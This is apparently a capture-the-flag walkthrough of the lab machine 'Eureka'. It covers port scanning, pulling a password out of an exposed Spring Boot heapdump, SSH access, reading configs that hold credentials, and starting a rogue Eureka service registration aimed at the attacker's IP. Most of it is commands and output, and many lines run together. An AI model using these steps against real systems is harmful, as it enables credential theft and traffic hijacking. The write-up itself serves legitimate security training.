Eureka
#linux #hard
Last updated
#linux #hard
Last updated
sudo nmap -p- -sS -T 5 -n -Pn -vv 10.10.11.66 -oA allPortsPORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63
8761/tcp open unknown syn-ack ttl 63nmap -p 22,80,8761 -sCV -n -Pn -vv 10.10.11.66 -oA openPortsPORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 d6:b2:10:42:32:35:4d:c9:ae:bd:3f:1f:58:65:ce:49 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCpa5HH8lfpsh11cCkEoqcNXWPj6wh8GaDrnXst/q7zd1PlBzzwnhzez+7mhwfv1PuPf5fZ7KtZLMfVPuUzkUHVEwF0gSN0GrFcKl/D34HmZPZAsSpsWzgrE2sayZa3xZuXKgrm5O4wyY+LHNPuHDUo0aUqZp/f7SBPqdwDdBVtcE8ME/AyTeJiJrOhgQWEYxSiHMzsm3zX40ehWg2vNjFHDRZWCj3kJQi0c6Eh0T+hnuuK8A3Aq2Ik+L2aITjTy0fNqd9ry7i6JMumO6HjnSrvxAicyjmFUJPdw1QNOXm+m+p37fQ+6mClAh15juBhzXWUYU22q2q9O/Dc/SAqlIjn1lLbhpZNengZWpJiwwIxXyDGeJU7VyNCIIYU8J07BtoE4fELI26T8u2BzMEJI5uK3UToWKsriimSYUeKA6xczMV+rBRhdbGe39LI5AKXmVM1NELtqIyt7ktmTOkRQ024ZoSS/c+ulR4Ci7DIiZEyM2uhVfe0Ah7KnhiyxdMSlb0=
| 256 90:11:9d:67:b6:f6:64:d4:df:7f:ed:4a:90:2e:6d:7b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNqI0DxtJG3vy9f8AZM8MAmyCh1aCSACD/EKI7solsSlJ937k5Z4QregepNPXHjE+w6d8OkSInNehxtHYIR5nKk=
| 256 94:37:d3:42:95:5d:ad:f7:79:73:a6:37:94:45:ad:47 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHNmmTon1qbQUXQdI6Ov49enFe6SgC40ECUXhF0agNVn
80/tcp open http syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://furni.htb/
8761/tcp open http syn-ack ttl 63 Apache Tomcat (language: en)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-auth:
| HTTP/1.1 401 \x0D
|_ Basic realm=Realm
|_http-title: Site doesn't have a title.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelecho '10.10.11.66 furni.htb' | sudo tee -a /etc/hostsdirsearch -w /usr/share/seclists/Discovery/Web-Content/Programming-Language-Specific/Java-Spring-Boot.txt -u 'http://furni.htb/' -f -t 100Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 100 | Wordlist size: 953
Target: http://furni.htb/
[12:30:19] Scanning:
[12:30:25] 200 - 2KB - /actuator
[12:30:25] 200 - 20B - /actuator/caches
[12:30:25] 200 - 6KB - /actuator/env
[12:30:26] 200 - 668B - /actuator/env/home
[12:30:26] 200 - 668B - /actuator/env/lang
[12:30:25] 200 - 36KB - /actuator/configprops
[12:30:26] 200 - 668B - /actuator/env/path
[12:30:26] 200 - 467B - /actuator/features
[12:30:26] 200 - 15B - /actuator/health
[12:30:26] 200 - 15B - /actuator/health/
[12:30:26] 200 - 2B - /actuator/info
[12:30:26] 200 - 3KB - /actuator/metrics
[12:30:27] 405 - 114B - /actuator/refresh
[12:30:26] 200 - 35KB - /actuator/mappings
[12:30:27] 200 - 54B - /actuator/scheduledtasks
[12:30:27] 400 - 108B - /actuator/sessions
[12:30:25] 200 - 180KB - /actuator/conditions
[12:30:26] 200 - 98KB - /actuator/loggers
[12:30:25] 200 - 198KB - /actuator/beans
[12:30:27] 200 - 101KB - /actuator/threaddump
[12:30:26] 200 - 76MB - /actuator/heapdumpwget http://furni.htb/actuator/heapdumpselect s.toString() from java.lang.String s where s.toString().contains("password")Usuario: oscar190
Contraseña: 0sc@r190_S0l!dP@sswdssh oscar190@furni.htboscar190@eureka: cd /var/www/web/user-management-service/src/main/resources
oscar190@eureka:/var/www/web/user-management-service/src/main/resources$ cat application.properties
spring.application.name=USER-MANAGEMENT-SERVICE
spring.session.store-type=jdbc
spring.cloud.inetutils.ignoredInterfaces=enp0s.*
spring.cloud.client.hostname=localhost
#Eureka
eureka.client.service-url.defaultZone= http://EurekaSrvr:0scarPWDisTheB3st@localhost:8761/eureka/
eureka.instance.hostname=localhost
eureka.instance.prefer-ip-address=false
#Mysql
spring.jpa.hibernate.ddl-auto=none
spring.datasource.url=jdbc:mysql://localhost:3306/Furni_WebApp_DB
spring.datasource.username=oscar190
spring.datasource.password=0sc@r190_S0l!dP@sswd
spring.datasource.driver-class-name=com.mysql.cj.jdbc.Driver
spring.jpa.properties.hibernate.format_sql=true
#tomcat
server.address=localhost
server.port=8081
# Enable proxy support
server.forward-headers-strategy=native
# Log
logging.level.root=INFO
logging.file.name=log/application.log
logging.file.path=./Username: EurekaSrvr
Password: 0scarPWDisTheB3stoscar190@eureka:~$ cat /etc/nginx/sites-enabled/default# Default server configuration
#
server {
listen 80;
listen [::]:80;
server_name furni.htb;
if ($host != "furni.htb") {
return 301 http://furni.htb$request_uri;
}
location = /actuator/heapdump {
alias /opt/heapdump/heapdump;
}
location = /favicon.ico { access_log off; log_not_found off; }
location /static/ {
root /var/www/web;
}
location / {
# pass to spring-cloud-gateway
proxy_pass http://127.0.0.1:8080;
include proxy_params;
}
}oscar190@eureka:~$ cat /var/www/web/cloud-gateway/src/main/resources/application.yamleureka:
instance:
hostname: localhost
prefer-ip-address: false
client:
registry-fetch-interval-seconds: 20
service-url:
defaultZone: http://EurekaSrvr:0scarPWDisTheB3st@localhost:8761/eureka/
spring:
cloud:
client:
hostname: localhost
gateway:
routes:
- id: user-management-service
uri: lb://USER-MANAGEMENT-SERVICE
predicates:
- Path=/login,/logout,/register,/process_register
- id: furni
uri: lb://FURNI
predicates:
- Path=/**
application:
name: app-gateway
server:
port: 8080
address: 127.0.0.1
management:
tracing:
sampling:
probability: 1
logging:
level:
root: INFO
file:
name: log/application.log
path: ./mkdir demo
unzip demo.zip -d demo
nano src/main/resources/application.propertiesspring.application.name=USER-MANAGEMENT-SERVICE
eureka.client.service-url.defaultZone =
http://EurekaSrvr:0scarPWDisTheB3st@eureka.htb:8761/eureka/
eureka.instance.ip-address=10.10.14.185
eureka.instance.prefer-ip-address=true